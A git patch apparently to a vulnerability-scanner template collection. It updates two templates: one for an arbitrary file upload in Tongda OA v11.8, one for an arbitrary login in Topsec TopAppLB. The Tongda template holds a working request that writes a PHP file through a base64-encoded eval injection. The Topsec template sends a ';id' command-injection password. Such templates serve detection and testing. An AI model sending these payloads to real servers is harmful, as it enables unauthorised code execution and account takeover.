From 33bf8b7cb2defdf9c0e9a50cc2d4fac4b0ff99df Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 8 Sep 2023 19:19:09 +0530
Subject: [PATCH] Updated

---
 ... => tongda-api-arbitrary-file-upload.yaml} | 24 ++++++++++---------
 ...l => topsec-topapplb-arbitrary-login.yaml} | 19 ++++++++-------
 2 files changed, 24 insertions(+), 19 deletions(-)
 rename http/vulnerabilities/tongda/{tongda-oa-api-ali-arbitrary-file-upload.yaml => tongda-api-arbitrary-file-upload.yaml} (58%)
 rename http/vulnerabilities/topsec/{topsec-topapplb-arbitrary-user-login.yaml => topsec-topapplb-arbitrary-login.yaml} (60%)

diff --git a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
similarity index 58%
rename from http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml
rename to http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
index 4b82e671d1..961a11bf82 100755
--- a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
@@ -1,12 +1,17 @@
-id: tongda-oa-api-ali-arbitrary-file-upload
+id: tongda-api-arbitrary-file-upload
 
 info:
-  name: tongda-oa-api-ali-arbitrary-file-upload
+  name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
   author: SleepingBag945
   severity: critical
-  description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞，攻击者通过漏可以上传恶意文件控制服务器
+  description: |
+    Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
   reference:
-    - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
+  metadata:
+    max-request: 1
+    fofa-query: app="TDXK-通达OA"
+    verified: true
   tags: tongda,oa
 
 http:
@@ -18,7 +23,7 @@ http:
         Accept-Encoding: gzip
 
         --502f67681799b07e5de6b503655f5cae
-        Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"
         Content-Type: application/octet-stream
 
         {"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
@@ -30,16 +35,13 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
       - |
-        GET /fb6790f4.php  HTTP/1.1
+        GET /{{randstr}}.php  HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-
-    # req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 200'
-          - 'status_code_2 == 200 && contains(body_2,"OK")'
-          - 'status_code_3 == 200 && contains(body_3,"phpinfo")'
+          - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
+          - 'contains(body_2,"OK") && contains(body_3,"phpinfo")'
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
similarity index 60%
rename from http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml
rename to http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
index 77604a295a..6c8589bc4d 100755
--- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
@@ -1,12 +1,17 @@
-id: topsec-topapplb-arbitrary-user-login
+id: topsec-topapplb-arbitrary-login
 
 info:
-  name: Topsec TopAppLB Any account Login
+  name: Topsec TopAppLB Any account Login - Arbitrary Login
   author: SleepingBag945
-  severity: critical
+  severity: high
   description: |
-    Any Account can log in to the background
-  tags: defaultaccount
+    Any Account can log in to the background.Enter any account on the login page, the password is ;id
+  reference:
+    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json  
+  metadata:
+    max-request: 1
+    fofa-query: title="TopApp-LB 负载均衡系统"
+  tags: topsec,topapplb,misconfig
 
 http:
   - raw:
@@ -14,7 +19,6 @@ http:
         POST /login_check.php  HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Sec-Fetch-Site: same-origin
         Sec-Fetch-Mode: navigate
@@ -25,9 +29,8 @@ http:
 
         userName=admin&password=%3Bid
 
-
     matchers:
       - type: dsl
         dsl:
           - 'status_code_1 == 302 && contains(header_1,"redirect.php")'
-        condition: and
+        condition: and
\ No newline at end of file